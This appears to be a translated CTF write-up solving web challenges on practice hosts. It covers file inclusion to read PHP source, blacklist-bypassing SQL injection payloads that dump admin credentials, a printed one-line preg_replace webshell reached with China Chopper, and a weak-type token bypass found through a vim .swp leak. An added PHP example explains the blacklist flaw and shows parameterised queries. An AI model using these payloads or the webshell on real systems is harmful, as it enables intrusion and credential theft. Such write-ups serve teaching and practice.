create table admin ( id integer, username text, userpass text, )
========================================================================
Now seriously:
This penetration test platform was developed by 三只小潴 (root#zcnhonker.net) & 冷愛 (hh250@qq.com), and modified with much effort by me, your boss Zhou; the challenges can't all be AKed, right? So if you solve this one you're awesome.
- From the URL this is clearly a file inclusion, so use it to view the source of about.php:
1. php://filter can be used
2. The file parameter itself reads source, so file=about.php works directly
about.php source:
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
$file=$_GET['file'];
if($file=="" || strstr($file,'config.php')){
echo "file參數不能為空！";
exit();
}
else{
$cut=strchr($file,"loginxlcteam");
if($cut==false){
$data=file_get_contents($file);
$date=htmlspecialchars($data);
echo $date;
}
else{
echo "<script>alert('敏感目錄，禁止查看!但是。。。')
</script>"; }
}
- file=loginxlcteam is probably the login page
- Function notes:
1. strstr() finds the first occurrence of a string inside another string and returns FALSE if it is not found.
2. strchr() is an alias of strstr().
3. (a) file=config.php or an empty file returns "file參數不能為空!" (the file parameter must not be empty)
(b) file=loginxlcteam returns the "sensitive directory, viewing forbidden! but..." alert
- Conclusion: about.php is a page for reading web page source.
- Plan:
1. The search field is SQL-injectable; get the admin username and password
2. getshell
1. SQL injection
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>搜索留言</title>
</head>
<body>
<center>
<div id="say" name="say" align="left" style="width:1024px">
<?php
if($_SERVER['HTTP_USER_AGENT']!="Xlcteam Browser"){
echo '萬惡滴黑闊，本功能只有用本公司開發的瀏覽器才可以用喔~';
exit();
}
$id=$_POST['soid'];
include 'config.php';
include 'antiinject.php';
include 'antixss.php';
$id=antiinject($id);
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能連接到數據庫!！".mysql_error());
mysql_select_db($db_name,$con);
$id=mysql_real_escape_string($id);
$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
$rs=mysql_fetch_array($result);
echo htmlspecialchars($rs['nice']).':<br /> '.antixss($rs['say']).'<br />';
mysql_free_result($result);
mysql_free_result($file);
mysql_close($con);
?>
</div>
</center>
</body>
</html>
- Use Modify Headers to set User-Agent to Xlcteam Browser
- View http://cms.nuptzj.cn/about.php/?file=antiinject.php
<?php
function antiinject($content){
$keyword=array("select","union","and","from",' ',"'",";",'"',"char","or","count","master","name","pass","admin","+","-","order","=");
$info=strtolower($content);
for($i=0;$i<=count($keyword);$i++){
$info=str_replace($keyword[$i], '',$info);
}
return $info;
}
?>
- Bypassing the blacklist; this differs from the $_SERVER["REQUEST_URI"] case in [AceBear CTF 2018] Web-urlparameter:
1. Here it is POST; urlparameter was GET.
2. Here the URL cannot be edited directly as in urlparameter.
- Bypass by writing each keyword inside itself (so that one pass of removal leaves the keyword behind), with /* */ comments in place of spaces.
- Injection steps:
1. soid=2/**/oorroorrderder/**/by/**/4
2. soid=1/**/aandnd/**/1>2/**/uunionnion/**/sselectelect/**/1,2,3,4
或:soid=0/**/uunionnion/**/sselectelect/**/1,2,3,4
3. soid=1/**/aandnd/**/1>2/**/uunionnion/**/sselectelect/**/1,concat_ws(0x7c,id,usernnameame,userppassass),3,4/**/ffromrom/**/aadmindmin
Result: 1|admin|102 117 99 107 114 117 110 116 117
- The password 102 117 99 107 114 117 110 116 117 decoded from ASCII is fuckruntu
- Yujian scanned a back-end login page, but it turned out to be wrong; the about.php source had already given the login page: file=loginxlcteam
- http://cms.nuptzj.cn/loginxlcteam
2. Log in and get a shell
- Use about.php again to view the xlcteam.php source: http://cms.nuptzj.cn/about.php?file=xlcteam.php
<?php $e = $_REQUEST['www']; $arr = array($_POST['wtf'] => '|.*|e',); array_walk($arr, $e, ''); ?>
- Connect with Caidao (China Chopper); see the referenced article for how to connect to this kind of one-line shell; password=wtf
http://cms.nuptzj.cn/xlcteam.php?www=preg_replace
- nctf{you_are_s0_g00d_hacker}
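Added example, not the CMS's code: the single-pass keyword stripping of antiinject() reproduced as a function, the double-written payload from the steps above run through it, and what the search handler should do instead (the keyword list is the page's; the function names are this example's own).

```php
<?php
// Added example, not the CMS's code: why one pass of str_replace() over a
// keyword blacklist (the page's antiinject()) is defeated by writing each
// keyword inside itself, and what the search handler should do instead.
// The keyword list is the page's; the function names are this example's own.

$keywords = ["select","union","and","from",' ',"'",";",'"',"char","or","count",
             "master","name","pass","admin","+","-","order","="];

// Same idea as antiinject(): lowercase, then delete every keyword once.
// str_replace() does not rescan, so removing the inner "union" from
// "uunionnion" leaves a fresh "union" behind.
function strip_once(string $s, array $keywords): string {
    $s = strtolower($s);
    foreach ($keywords as $k) {
        $s = str_replace($k, '', $s);
    }
    return $s;
}

// Repeating until nothing changes closes that hole, but a blacklist is still
// the wrong tool: it mangles legitimate data and cannot anticipate every
// MySQL spelling (comments, case, encodings).
function strip_until_stable(string $s, array $keywords): string {
    do {
        $before = $s;
        $s = strip_once($s, $keywords);
    } while ($s !== $before);
    return $s;
}

// What the search handler should do: soid is a message id, so accept only an
// integer and bind it in a prepared statement. Anything else is rejected, not cleaned.
function parse_soid($raw): ?int {
    if (!is_string($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT);
    return $id === false ? null : $id;
}

function fetch_message(mysqli $conn, int $id): ?array {
    $stmt = mysqli_prepare($conn, 'SELECT * FROM `message` WHERE display=1 AND id=?');
    mysqli_stmt_bind_param($stmt, 'i', $id);
    mysqli_stmt_execute($stmt);
    return mysqli_stmt_get_result($stmt)->fetch_assoc() ?: null;
}

// Constructed inputs: the page's double-written payload and a legitimate value.
$payload = '0/**/uunionnion/**/sselectelect/**/1,2,3,4';
var_dump(strip_once($payload, $keywords));          // "0/**/union/**/select/**/1,2,3,4"
var_dump(strip_until_stable($payload, $keywords));  // "0/**//**//**/1,2,3,4"
var_dump(strip_once('Anderson', $keywords));        // "erson": harmless input destroyed
var_dump(parse_soid($payload));                     // NULL
var_dump(parse_soid('2'));                          // int(2)
```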
Password reset 2
Every challenge gets solved instantly; I wasn't having it!
This challenge comes from CUMT
Challenge link
TIPS:
1. The admin email can be found by looking around
2. On Linux vi is commonly used, and an abnormal exit leaves a backup file
3. Weak-type bypass
- View the source to find the email: admin@nuptzj.cn
<pre id="line1"><!DOCTYPE html>
<html> <head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="renderer" content="webkit" />
<meta name="admin" content="admin@nuptzj.cn" />
<meta name="editor" content="Vim" />
<title>logic</title>
<style type="text/css"> body,html{
position: relative;
height: 100%;
width: 100%;
padding: 0;
margin: 0;
background-color: #272822;
color: #fff;
}
form{
position: absolute;
top: 50%;
left: 50%;
width: 400px;
margin: -70px -200px;
}
form input{
display: block;
margin: 10px auto;
width: 100%;
border: none;
height: 2rem;
border-radius: 5px;
} </style> </head> <body>
<form action="[submit.php](view-source:http://nctf.nuptzj.cn/web14/submit.php)" method="GET">
<h1>找回管理員密碼</h1> email:<input name="emailAddress" type="text" />
</br> token:<input name="token" type="text" />
</br> <input type="submit" value="提交">
</form> </body> </html> </pre>
- Try to find a .swp file:
1. http://nctf.nuptzj.cn/web14/.index.php.swp ---- Not Found
2. http://nctf.nuptzj.cn/web14/.submit.php.swp --- Success
........ (this line is omitted code) ........
/*
If the login email address is not the administrator's, die()
Database structure:
--
-- Table structure for table `user`
--
CREATE TABLE IF NOT EXISTS `user` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`username` varchar(255) NOT NULL,
`email` varchar(255) NOT NULL,
`token` int(255) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;
--
-- Data for table `user`
--
INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES
(1, '****不可见***', '***不可见***', 0);
*/
........ (this line is omitted code) ........
if(!empty($token)&&!empty($emailAddress)){
if(strlen($token)!=10) die('fail');
if($token!='0') die('fail');
$sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
$r = mysql_query($sql) or die('db error');
$r = mysql_fetch_assoc($r);
$r = $r['num'];
if($r>0){
echo $flag;
}else{
echo "失败了啊";
}
}
- Key code:
if(strlen($token)!=10) die('fail');
if($token!='0') die('fail');
- Set token=0000000000 and it appears; the point of the challenge is finding the .swp file.
flag:nctf{thanks_to_cumt_bxs}
- nctf{thanks_to_cumt_bxs}
Injection practice 1
Please use Firefox with the HackBar add-on (look it up and get familiar with it yourself)
Target URL: address
The flag is the 32-character lowercase md5 of the admin password
wrapped in nctf{}
A manual injection tutorial was posted in the group.
If you don't understand, search for "mysql manual injection" articles yourself
PS: if you did it with sqlmap or similar tools, don't have the nerve to submit
- Seems to be dead; see the referenced article